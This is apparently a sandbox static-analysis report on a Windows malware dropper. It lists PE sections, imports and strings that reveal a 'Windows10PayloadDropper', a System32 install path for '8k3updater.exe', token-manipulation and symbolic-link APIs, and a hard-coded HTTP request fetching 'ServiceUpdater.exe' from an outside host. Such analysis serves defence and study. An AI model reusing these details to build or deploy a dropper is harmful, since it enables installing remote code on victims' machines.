Static | ZeroBOX

PE Compile Time

2019-11-09 23:43:45

PE Imphash

d5ae4988730831acfbbd66007518e0f4

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0002a5cc 0x0002a600 6.54903441127
.rdata 0x0002c000 0x00010ef0 0x00011000 5.36016750375
.data 0x0003d000 0x000dd92c 0x000dcc00 6.37229748307
.reloc 0x0011b000 0x00002564 0x00002600 6.52419538153

Imports

Library SHLWAPI.dll:
0x42c1a0 PathRemoveFileSpecW
Library ADVAPI32.dll:
0x42c000 SetTokenInformation
0x42c008 OpenProcessToken
0x42c00c DuplicateTokenEx
Library ole32.dll:
0x42c1ac CoGetStdMarshalEx
0x42c1b0 CoMarshalInterface
0x42c1b4 CoUninitialize
0x42c1b8 CoCreateInstance
0x42c1bc CoInitialize
Library OLEAUT32.dll:
0x42c17c SysAllocString
0x42c180 VariantClear
0x42c184 CreateTypeLib2
0x42c188 LoadTypeLib
0x42c190 SysStringByteLen
0x42c194 SysStringLen
0x42c198 SysFreeString
Library KERNEL32.dll:
0x42c014 WriteConsoleW
0x42c018 TlsFree
0x42c01c HeapSize
0x42c020 CreateFileW
0x42c024 GetProcessHeap
0x42c028 SetStdHandle
0x42c038 GetOEMCP
0x42c03c GetACP
0x42c040 IsValidCodePage
0x42c044 FindNextFileW
0x42c048 FindFirstFileExW
0x42c04c FindClose
0x42c050 HeapReAlloc
0x42c054 RemoveDirectoryW
0x42c058 DeleteFileW
0x42c05c ReadConsoleW
0x42c060 SetFilePointerEx
0x42c064 CreateDirectoryA
0x42c068 CreateFileA
0x42c06c DeleteFileA
0x42c070 GetFileSize
0x42c074 QueryDosDeviceW
0x42c078 ReadFile
0x42c07c WriteFile
0x42c080 CloseHandle
0x42c084 Sleep
0x42c088 GetCurrentProcess
0x42c08c GetCurrentProcessId
0x42c098 GetModuleFileNameW
0x42c09c GetModuleHandleW
0x42c0a0 GetProcAddress
0x42c0a4 LocalAlloc
0x42c0a8 LocalFree
0x42c0ac FormatMessageA
0x42c0b0 OpenMutexA
0x42c0b4 GetLastError
0x42c0b8 WideCharToMultiByte
0x42c0c8 MultiByteToWideChar
0x42c0cc EncodePointer
0x42c0d0 DecodePointer
0x42c0d4 SetLastError
0x42c0dc SwitchToThread
0x42c0e0 TlsAlloc
0x42c0e4 TlsGetValue
0x42c0e8 TlsSetValue
0x42c0ec SetEndOfFile
0x42c0f4 CompareStringW
0x42c0f8 LCMapStringW
0x42c0fc GetLocaleInfoW
0x42c100 GetStringTypeW
0x42c104 GetCPInfo
0x42c110 TerminateProcess
0x42c11c GetCurrentThreadId
0x42c120 InitializeSListHead
0x42c124 IsDebuggerPresent
0x42c128 GetStartupInfoW
0x42c12c GetFileSizeEx
0x42c130 RaiseException
0x42c134 RtlUnwind
0x42c138 FreeLibrary
0x42c13c LoadLibraryExW
0x42c140 ExitProcess
0x42c144 GetModuleHandleExW
0x42c148 GetStdHandle
0x42c14c GetCommandLineA
0x42c150 GetCommandLineW
0x42c154 HeapFree
0x42c158 HeapAlloc
0x42c15c IsValidLocale
0x42c160 GetUserDefaultLCID
0x42c164 EnumSystemLocalesW
0x42c168 GetFileType
0x42c16c FlushFileBuffers
0x42c170 GetConsoleCP
0x42c174 GetConsoleMode

!This program cannot be run in DOS mode.
ARichj
`.rdata
@.data
.reloc
9E$WWV
t,WW9}
QQSVWd
tH9] uC
u PWQR
URPQQh
;t$,v-
UQPXY]Y[
u9jAXf;
u-jAXf;
F4_^[]
<ItC<Lt3<Tt#<h
A<lt'<tt
<ItC<Lt3<Tt#<h
A<lt'<tt
Tt)jhZf;
Jjl^f;
V2jx_f;
F2jgYf;
7ARPRQh
PPPPPPPP
SWt@jU
@s1PVj@W
>Cu2f9V
Wj0XPV
SPjdVQ
PPPPPWS
PP9E u<PPVWP
<at1<rt!<wt
<=upG8
tlj*Yf
SSVWh
f9:t!V
QQSVj8j@
NX9^`t1
;V\uYW
u2Vj@h
9C`u99C\t4
u29K\t-
PPPPPPPP
Unknown
RtlInitUnicodeString
NtCreateSymbolicLinkObject
Error creating link %ls: %08X
Error getting device for %ls
IBadger
ITMediaControl
8k3mutexF19
vcruntime140.dll
msvcp140.dll
dropper.exe
Error: %ls
output.tlb
run.sct
AAAAAAAAA*
Windows\System32\tapi3.dll
dropper.exe
vcruntime140.dll
msvcp140.dll
Windows\System32
Windows
please enter the password:
Unknown exception
bad cast
bad locale name
generic
iostream
iostream stream error
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
IDispatch error #%d
Unknown error 0x%0lX
JobError
JobModification
FileTransferred
vector<T> too long
invalid string position
string too long
bad allocation
unknown error
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
device or resource busy
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid argument
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
no such process
not a directory
not a socket
not a stream
not connected
not enough memory
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
resource deadlock would occur
resource unavailable try again
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
InitOnceExecuteOnce
CreateEventExW
CreateSemaphoreW
CreateSemaphoreExW
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
CreateSymbolicLinkW
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleEx
SetFileInformationByHandle
GetSystemTimePreciseAsFileTime
InitializeConditionVariable
WakeConditionVariable
WakeAllConditionVariable
SleepConditionVariableCS
InitializeSRWLock
AcquireSRWLockExclusive
TryAcquireSRWLockExclusive
ReleaseSRWLockExclusive
SleepConditionVariableSRW
CreateThreadpoolWork
SubmitThreadpoolWork
CloseThreadpoolWork
CompareStringEx
GetLocaleInfoEx
LCMapStringEx
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
bad array new length
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
CorExitProcess
`h````
xpxxxx
`h`hhh
xwpwpp
(null)
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
AreFileApisANSI
CompareStringEx
EnumSystemLocalesEx
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
InitializeCriticalSectionEx
IsValidLocaleName
LCMapStringEx
LCIDToLocaleName
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
UTF-16LEUNICODE
_hypot
_nextafter
1#QNAN
1#SNAN
]vQ<)8
|)P!?Ua0
Eb2]A=
u?^p?o4
y1~?|"
?x+s7
?5Od%
?|I7Z#
>,'1D=
?g)([|X>=
~U`?K
:h"?bC
@H#?43
Ax#?uN}*
r7Yr7=
F0$?3=1
H`$?h|
&?~YK|
sU0&?W
<8bunz8
?#%X.y
F||<##
<@En[vP
b<log10
?5Wg4p
%S#[k=
"B <1=
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
PathRemoveFileSpecW
SHLWAPI.dll
CreateProcessAsUserW
OpenProcessToken
DuplicateTokenEx
SetTokenInformation
ADVAPI32.dll
CoUninitialize
CoMarshalInterface
CoGetStdMarshalEx
CoInitializeSecurity
CoCreateInstance
CoInitialize
ole32.dll
OLEAUT32.dll
CreateDirectoryA
CreateFileA
DeleteFileA
GetFileSize
QueryDosDeviceW
ReadFile
WriteFile
CloseHandle
GetCurrentProcess
GetCurrentProcessId
ProcessIdToSessionId
GetWindowsDirectoryW
GetModuleFileNameW
GetModuleHandleW
GetProcAddress
LocalAlloc
LocalFree
FormatMessageA
OpenMutexA
GetLastError
WideCharToMultiByte
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
MultiByteToWideChar
EncodePointer
DecodePointer
SetLastError
InitializeCriticalSectionAndSpinCount
SwitchToThread
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetSystemTimeAsFileTime
CompareStringW
LCMapStringW
GetLocaleInfoW
GetStringTypeW
GetCPInfo
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentThreadId
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
KERNEL32.dll
RaiseException
RtlUnwind
FreeLibrary
LoadLibraryExW
ExitProcess
GetModuleHandleExW
GetStdHandle
GetCommandLineA
GetCommandLineW
HeapFree
HeapAlloc
IsValidLocale
GetUserDefaultLCID
EnumSystemLocalesW
GetFileType
FlushFileBuffers
GetConsoleCP
GetConsoleMode
GetFileSizeEx
SetFilePointerEx
ReadConsoleW
DeleteFileW
RemoveDirectoryW
HeapReAlloc
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetProcessHeap
CreateFileW
HeapSize
WriteConsoleW
SetEndOfFile
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
L$ SVWH
D$@HcH
@SUVWAVH
L90u"H
0A^_^][
|$ AVH
|$ AVH
@SUVATH
(A\^][
H3E H3E
u0HcH<H
bad allocation
bad array new length
c:\Windows\System32\vcruntime140.dll
c:\Windows\System32\8k3updater.exe
c:\Windows\System32\8k3updater.exe -i
CreateProcess failed (%d).
Unknown exception
bad cast
string too long
C:\Users\steve\source\repos\PROG8300_F19_FinalProject\Windows10PayloadDropper\x64\Release\Windows10PayloadDropper.pdb
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.pdata
.rsrc$01
.rsrc$02
WaitForSingleObject
GetLastError
CloseHandle
CreateProcessA
KERNEL32.dll
??1_Lockit@std@@QEAA@XZ
??0_Lockit@std@@QEAA@H@Z
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ
?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A
?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z
?_Xlength_error@std@@YAXPEBD@Z
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ
?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z
??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ
?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAPEADXZ
??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z
?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z
?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ
??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ
?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ
?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z
?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z
?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z
?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z
??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ
?always_noconv@codecvt_base@std@@QEBA_NXZ
??Bid@locale@std@@QEAA_KXZ
MSVCP140.dll
__CxxFrameHandler3
__std_exception_destroy
__std_exception_copy
__std_terminate
__C_specific_handler
_CxxThrowException
memset
VCRUNTIME140.dll
__acrt_iob_func
__stdio_common_vfprintf
fflush
fclose
_unlock_file
_lock_file
fwrite
fgetpos
setvbuf
ungetc
fsetpos
_fseeki64
_invalid_parameter_noinfo_noreturn
_get_stream_buffer_pointers
_callnewh
malloc
_seh_filter_exe
_set_app_type
__setusermatherr
_configure_narrow_argv
_initialize_narrow_environment
_get_initial_narrow_environment
_initterm
_initterm_e
_set_fmode
__p___argc
__p___argv
_cexit
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
_initialize_onexit_table
_register_onexit_function
_crt_atexit
terminate
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-filesystem-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetModuleHandleW
memcpy
memmove
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
L$ SVWH
WAVAWH
H3E H3E
u0HcH<H
Unknown exception
bad allocation
bad array new length
www.securityresearch.ca
GET /infected/8K3F19/ServiceUpdater.exe HTTP/1.1
Host: www.securityresearch.ca
Connection: close
C:\Users\steve\source\repos\PROG8300_F19_FinalProject\Payload_windowsService\Release\CppWindowsService.pdb
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.pdata
.rsrc$01
.rsrc$02
GetLastError
CreateMutexW
WaitForSingleObject
QueueUserWorkItem
CreateEventW
SetEvent
CloseHandle
GetModuleFileNameW
KERNEL32.dll
ReportEventW
RegisterEventSourceW
StartServiceCtrlDispatcherW
RegisterServiceCtrlHandlerW
SetServiceStatus
DeregisterEventSource
OpenServiceW
StartServiceW
ControlService
DeleteService
OpenSCManagerW
CloseServiceHandle
QueryServiceStatus
CreateServiceW
ADVAPI32.dll
WS2_32.dll
__CxxFrameHandler3
__C_specific_handler
__std_exception_copy
__std_exception_destroy
_CxxThrowException
memset
VCRUNTIME140.dll
__acrt_iob_func
_wcsicmp
__stdio_common_vfwprintf
_callnewh
malloc
_seh_filter_exe
_set_app_type
__setusermatherr
_configure_wide_argv
_initialize_wide_environment
_get_initial_wide_environment
_initterm
_initterm_e
_set_fmode
__p___argc
__p___wargv
_cexit
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
_initialize_onexit_table
_register_onexit_function
_crt_atexit
terminate
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-string-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetModuleHandleW
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVCSampleService@@
.?AVCServiceBase@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
A:8ueI
t&A88t
fA;8upI
fA;(t(fA98t
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
`A_A^A]A\_^]
SVWATAUAVAWH
l$(LcO
0A_A^A]A\_^[
VWATAVAWH
A_A^A\_^
@SVWATAUAVAWH
L!t$0L!t$(
D$@L9wXt"
pA_A^A]A\_^[
B(I9A(u
x AUAVAWH
tsMc>L
A_A^A]
|$ ATAVAWH
A_A^A\
WATAUAVAWH
A_A^A]A\_
x AVHcA
VWATAUAVAWL
|$XHcU
D$8HcJ
H;D$Pu
l$HA_A^A]A\_^
SUVWATAUAVAWL
H9D$Pu@H
A_A^A]A\_^][
WATAUAVAWH
(D$@fA
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
UAVAWH
UWATAVAWH
A_A^A\_]
<Kt!<L
\$ D8t$(udH
UATAUAVAWH
A_A^A]A\]
x UAVAWH
L9|$ t=@
UVWATAUAVAWH
L!d$pH
UhD!d$xH
A_A^A]A\_^]
<0t-<2t
<1~1<3~$<4t9<5t
H97tH
UWATAVAWH
WtHv:A
M9&t<A
A_A^A\_]
x UATAUAVAWH
D8)u#L
)u!D8)t
M9/tJE
A_A^A]A\]
UAVAWH
@A_A^]
UATAUAVAWH
t$(D80
D80t'H
D80tFH
D8t$ t#L
uYM94$tSE
*M94$tBA
D8t$(t
uuL92tf
uDM91t?H
A_A^A]A\]
|$ UAVAWH
t`E88t[3
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
t3H;XXs
tHH;xXu
WATAUAVAWH
A_A^A]A\_
ffffff
t<ffff
LcA<E3
u HcA<H
H3E H3E
Unknown exception
bad exception
Access violation - no RTTI data!
Attempted a typeid of nullptr pointer!
Bad read pointer - no RTTI data!
Bad dynamic_cast!
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
template-parameter-
generic-type-
`anonymous namespace'
`non-type-template-parameter
`template-parameter
`template-type-parameter-
`generic-class-parameter-
`generic-method-parameter-
`vtordispex{
`vtordisp{
`adjustor{
`local static destructor helper'
`template static data member constructor helper'
`template static data member destructor helper'
static
virtual
private:
protected:
public:
[thunk]:
extern "C"
short
unsigned
volatile
std::nullptr_t
std::nullptr_t
<ellipsis>
,<ellipsis>
noexcept
double
__int8
__int16
__int32
__int64
__int128
<unknown>
char16_t
char32_t
wchar_t
__w64
UNKNOWN
signed
volatile
`unknown ecsu'
union
struct
class
coclass
cointerface
volatile
const
cli::array<
cli::pin_ptr<
{flat}
vcruntime140.amd64.pdb
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.gfids
.giats
.rdata
.rdata$r
.rdata$zzzdbg
.xdata
.xdata$x
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.pdata
.rsrc$01
.rsrc$02
VCRUNTIME140.dll
_CreateFrameInfo
_CxxThrowException
_FindAndUnlinkFrame
_IsExceptionObjectToBeDestroyed
_SetWinRTOutOfMemoryExceptionCallback
__AdjustPointer
__BuildCatchObject
__BuildCatchObjectHelper
__C_specific_handler
__C_specific_handler_noexcept
__CxxDetectRethrow
__CxxExceptionFilter
__CxxFrameHandler
__CxxFrameHandler2
__CxxFrameHandler3
__CxxQueryExceptionSize
__CxxRegisterExceptionObject
__CxxUnregisterExceptionObject
__DestructExceptionObject
__FrameUnwindFilter
__GetPlatformExceptionInfo
__NLG_Dispatch2
__NLG_Return2
__RTCastToVoid
__RTDynamicCast
__RTtypeid
__TypeMatch
__current_exception
__current_exception_context
__intrinsic_setjmp
__intrinsic_setjmpex
__processing_throw
__report_gsfailure
__std_exception_copy
__std_exception_destroy
__std_terminate
__std_type_info_compare
__std_type_info_destroy_list
__std_type_info_hash
__std_type_info_name
__telemetry_main_invoke_trigger
__telemetry_main_return_trigger
__unDName
__unDNameEx
__uncaught_exception
__uncaught_exceptions
__vcrt_GetModuleFileNameW
__vcrt_GetModuleHandleW
__vcrt_InitializeCriticalSectionEx
__vcrt_LoadLibraryExW
_get_purecall_handler
_get_unexpected
_is_exception_typeof
_local_unwind
_purecall
_set_purecall_handler
_set_se_translator
longjmp
memchr
memcmp
memcpy
memmove
memset
set_unexpected
strchr
strrchr
strstr
unexpected
wcschr
wcsrchr
wcsstr
terminate
strcpy_s
malloc
calloc
wcsncmp
__stdio_common_vsprintf_s
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-string-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-convert-l1-1-0.dll
RtlUnwindEx
EncodePointer
RaiseException
RtlPcToFileHeader
InterlockedFlushSList
InterlockedPushEntrySList
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
SetLastError
GetLastError
TlsSetValue
InitializeCriticalSectionAndSpinCount
TlsAlloc
GetProcAddress
FreeLibrary
TlsGetValue
TlsFree
LoadLibraryExW
GetModuleFileNameW
GetModuleHandleW
RtlLookupFunctionEntry
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
RtlCaptureContext
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
KERNEL32.dll
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVbad_typeid@std@@
.?AVbad_cast@std@@
.?AV__non_rtti_object@std@@
.?AVpcharNode@@
.?AVpairNode@@
.?AVDNameStatusNode@@
.?AVpDNameNode@@
.?AVcharNode@@
.?AVDNameNode@@
Washington1
Redmond1
Microsoft Corporation1!0
Microsoft Time-Stamp PCA0
160907175850Z
180907175850Z0
Washington1
Redmond1
Microsoft Corporation1
AOC1'0%
nCipher DSE ESN:7AB5-2DF2-DA3F1%0#
Microsoft Time-Stamp Service0
i}W?%HI
Chttp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0X
<http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0
af2MsX$
y|.WNR
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Code Signing PCA0
170811201115Z
180811201115Z0
Washington1
Redmond1
Microsoft Corporation1
Microsoft Corporation0
b{VpuOg
MOPR1402
+229803+1abf9e5f-ced0-42e6-a65d-d9350959fe0e0
Ehttp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0Z
>http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0
?w?^s'W
microsoft1-0+
$Microsoft Root Certificate Authority0
100831221932Z
200831222932Z0y1
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Code Signing PCA0
?http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T
8http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0
`Ge`@N
microsoft1-0+
$Microsoft Root Certificate Authority0
070403125309Z
210403130309Z0w1
Washington1
Redmond1
Microsoft Corporation1!0
Microsoft Time-Stamp PCA0
microsoft1-0+
$Microsoft Root Certificate Authority
?http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T
8http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0
1Jv1=+r
L&*H$_Z
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Code Signing PCA
y|.WNR
http://microsoft.com0
Washington1
Redmond1
Microsoft Corporation1!0
Microsoft Time-Stamp PCA
180405060304Z0#
Washington1
Redmond1
Microsoft Corporation1(0&
Microsoft Code Signing PCA 20110
170811202024Z
180811202024Z0t1
Washington1
Redmond1
Microsoft Corporation1
Microsoft Corporation0
MOPR1402
+230012+c804b5ea-49b4-4238-8362-d851fa2254fc0
Chttp://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl0a
Ehttp://www.microsoft.com/pkiops/certs/MicCodSigPCA2011_2011-07-08.crt0
+Z1[9j
Washington1
Redmond1
Microsoft Corporation1200
)Microsoft Root Certificate Authority 20110
110708205909Z
260708210909Z0~1
Washington1
Redmond1
Microsoft Corporation1(0&
Microsoft Code Signing PCA 20110
Ihttp://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl0^
Bhttp://www.microsoft.com/pki/certs/MicRooCerAut2011_2011_03_22.crt0
3http://www.microsoft.com/pkiops/docs/primarycps.htm0@
*?*kXIc
QEX82q'
WqVNHE
Washington1
Redmond1
Microsoft Corporation1(0&
Microsoft Code Signing PCA 2011
http://microsoft.com0
20180405060305.972Z0
Washington1
Redmond1
Microsoft Corporation1
AOC1&0$
Thales TSS ESN:96FF-4BC5-A7DC1%0#
Microsoft Time-Stamp Service
Washington1
Redmond1
Microsoft Corporation1200
)Microsoft Root Certificate Authority 20100
100701213655Z
250701214655Z0|1
Washington1
Redmond1
